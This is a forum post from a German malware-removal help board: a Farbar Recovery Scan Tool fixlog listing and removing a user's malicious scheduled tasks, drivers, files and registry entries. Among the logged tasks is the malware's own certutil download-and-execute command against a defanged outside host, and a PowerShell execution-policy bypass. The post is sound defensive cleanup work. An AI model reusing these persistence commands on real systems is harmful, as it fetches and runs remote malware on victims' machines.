| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: trojaner?/virus?Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
01.06.2018, 09:49
| #16 |
 |  trojaner?/virus? Fixlog.txt Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 10:33:19) Run:2
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
C:\Program Files\SystemaRev
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe" [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
CMD: dir "%ProgramFiles%"
CMD: dir "%ProgramFiles(x86)%"
CMD: dir "%ProgramData%"
CMD: dir "%Appdata%"
CMD: dir "%LocalAppdata%"
CMD: dir "%CommonProgramFiles(x86)%"
CMD: dir "%CommonProgramW6432%"
CMD: dir "%UserProfile%"
CMD: dir "C:\"
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
cmd: netsh winsock reset catalog
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state ON
cmd: Bitsadmin /Reset /Allusers
EmptyTemp:
*****************
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\JServicesManager" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\JServicesManager" => erfolgreich entfernt
"C:\Program Files\SystemaRev" => nicht gefunden
WNetworkMgmt => Dienst nicht gefunden.
"C:\ProgramData\Microsoft\Windows\WNetworkMgmt" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\FairplayKD" => erfolgreich entfernt
FairplayKD => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Synth3dVsc" => erfolgreich entfernt
Synth3dVsc => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\tsusbhub" => erfolgreich entfernt
tsusbhub => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\VGPU" => erfolgreich entfernt
VGPU => Dienst erfolgreich entfernt
Winmon => Dienst nicht gefunden.
WinmonFS => Dienst nicht gefunden.
WinmonProcessMonitor => Dienst nicht gefunden.
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => nicht gefunden
"C:\Windows\System32\drivers\WinmonFS.sys" => nicht gefunden
"C:\Windows\System32\drivers\Winmon.sys" => nicht gefunden
"C:\Windows\System32\Tasks\MainPMgr" => nicht gefunden
"C:\Windows\System32\Tasks\SystemUpdate64" => nicht gefunden
"C:\Program Files\SystemaRev" => nicht gefunden
C:\Windows\ntbtlog.txt => erfolgreich verschoben
"C:\ProgramData\SystemaRev" => nicht gefunden
"C:\Windows\System32\Tasks\ReimageUpdater" => nicht gefunden
"C:\Windows\Reimage.ini" => nicht gefunden
"C:\Users\Nico\AppData\Roaming\ParetoLogic" => nicht gefunden
"C:\Windows\SysWOW64\SSL" => nicht gefunden
"C:\Users\Nico\AppData\Local\sham.db" => nicht gefunden
"C:\Users\Nico\AppData\Local\InstallationConfiguration.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\agent.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.tst" => nicht gefunden
"C:\Users\Nico\AppData\Local\Jaytip.bin" => nicht gefunden
"C:\Windows\qcusolizqbhuglpw.qcus" => nicht gefunden
"C:\Users\Nico\AppData\Local\VoltFinlab.bin" => nicht gefunden
C:\Users\Nico\AppData\Local\installer.dat => erfolgreich verschoben
"C:\Users\Nico\AppData\Local\noah.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Config.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\Main.dat" => nicht gefunden
"C:\Windows\SysWOW64\findit.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\md.xml" => nicht gefunden
"C:\ProgramData\Logic Cramble" => nicht gefunden
C:\Users\Nico\ntuser.pol => erfolgreich verschoben
"C:\Users\Nico\AppData\Roaming\FastDataX" => nicht gefunden
"C:\Users\Nico\AppData\Local\XService" => nicht gefunden
C:\Users\Nico\AppData\Local\Package Cache => erfolgreich verschoben
"C:\Users\Nico\AppData\Roaming\EpicNet Inc" => nicht gefunden
"C:\Windows\System32\Tasks\ScheduledUpdate" => nicht gefunden
"C:\Windows\System32\Tasks\csrss" => nicht gefunden
"C:\Windows\system32\Drivers\WinmonProcessMonitor.sys" => nicht gefunden
C:\Windows\System32\Tasks\AncillaryFunctionauf => erfolgreich verschoben
"C:\Users\Nico\AppData\Local\betterworld" => nicht gefunden
"C:\Windows\system32\mcicda64.dll" => nicht gefunden
"C:\Windows\System32\Tasks\WindowsRecoveryCleaner" => nicht gefunden
C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE} => erfolgreich verschoben
C:\ProgramData\ntuser.pol => erfolgreich verschoben
C:\Windows\System32\Tasks\Social Software => erfolgreich verschoben
"C:\ProgramData\Iostream.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\pfialx.dll" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM" => nicht gefunden
"C:\Users\Public\Documents\XMUpdate" => nicht gefunden
"C:\Program Files\Common Files\5ZNAWZD2EL69" => nicht gefunden
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk => erfolgreich verschoben
C:\Users\Nico\AppData\LocalLow\AMD => erfolgreich verschoben
"C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe" => nicht gefunden
C:\Windows\uninstaller.dat => erfolgreich verschoben
C:\Windows\msdownld.tmp => erfolgreich verschoben
"C:\ProgramData\Iostream.exe" => nicht gefunden
"C:\Program Files (x86)\Common Files\new.bat" => nicht gefunden
"C:\Users\Nico\AppData\Local\agent.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Config.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.tst" => nicht gefunden
"C:\Users\Nico\AppData\Local\InstallationConfiguration.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\installer.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Jaytip.bin" => nicht gefunden
"C:\Users\Nico\AppData\Local\Main.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\md.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\noah.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\pfialx.dll" => nicht gefunden
"C:\Users\Nico\AppData\Local\Resmon.ResmonCfg" => nicht gefunden
"C:\Users\Nico\AppData\Local\sham.db" => nicht gefunden
"C:\Users\Nico\AppData\Local\uninstall_temp.ico" => nicht gefunden
"C:\Users\Nico\AppData\Local\VoltFinlab.bin" => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F} => nicht gefunden
"C:\Windows\system32\mcicda64.dll" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{099A856C-08D3-43C8-AD18-3D651763C816}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{099A856C-08D3-43C8-AD18-3D651763C816}" => erfolgreich entfernt
"C:\Windows\System32\Tasks\Social Software" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Social Software" => erfolgreich entfernt
"C:\Program Files\Social Software" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} => nicht gefunden
"C:\Windows\System32\Tasks\SystemUpdate64" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemUpdate64 => nicht gefunden
"C:\Program Files\SystemaRev" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_FG => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} => nicht gefunden
"C:\Windows\System32\Tasks\csrss" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{412B9FDA-8C4C-40F4-A23C-696805866F9C}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{412B9FDA-8C4C-40F4-A23C-696805866F9C}" => erfolgreich entfernt
"C:\Windows\System32\Tasks\AncillaryFunctionauf" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AncillaryFunctionauf" => erfolgreich entfernt
"C:\Program Files (x86)\nodejs" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42767FB3-1423-4F1B-8F31-8B5936FA8F06} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_VJ => nicht gefunden
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{478261E4-F178-4CD8-8575-B8ACE5A0769E} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_AM => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6372E416-89E4-46ED-A9C3-6F1F6F797A15} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_NM => nicht gefunden
"C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7}" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} => nicht gefunden
"C:\Windows\System32\Tasks\ScheduledUpdate" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E7DD5F8-0819-4296-8B92-EEA20358E2F3} => nicht gefunden
"C:\Windows\System32\Tasks\MainPMgr" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MainPMgr => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB4D74FB-B89A-4A74-982B-76AE532F4F7F} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_OT => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159}" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159} => nicht gefunden
"C:\Windows\System32\Tasks\ReimageUpdater" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater => nicht gefunden
"C:\Program Files\Reimage" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} => nicht gefunden
"C:\Windows\System32\Tasks\WindowsRecoveryCleaner" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsRecoveryCleaner => nicht gefunden
"C:\ProgramData\Iostream.exe" => nicht gefunden
C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Verknüpfung Eigenschaft erfolgreich entfernt
C:\ProgramData => ":NT" ADS erfolgreich entfernt
C:\ProgramData => ":NT2" ADS erfolgreich entfernt
"C:\Users\All Users" => ":NT" ADS nicht gefunden.
"C:\Users\All Users" => ":NT2" ADS nicht gefunden.
"C:\ProgramData\Anwendungsdaten" => ":NT" ADS nicht gefunden.
"C:\ProgramData\Anwendungsdaten" => ":NT2" ADS nicht gefunden.
"C:\ProgramData\Application Data" => ":NT" ADS nicht gefunden.
"C:\ProgramData\Application Data" => ":NT2" ADS nicht gefunden.
C:\ProgramData\MTA San Andreas All => ":NT" ADS erfolgreich entfernt
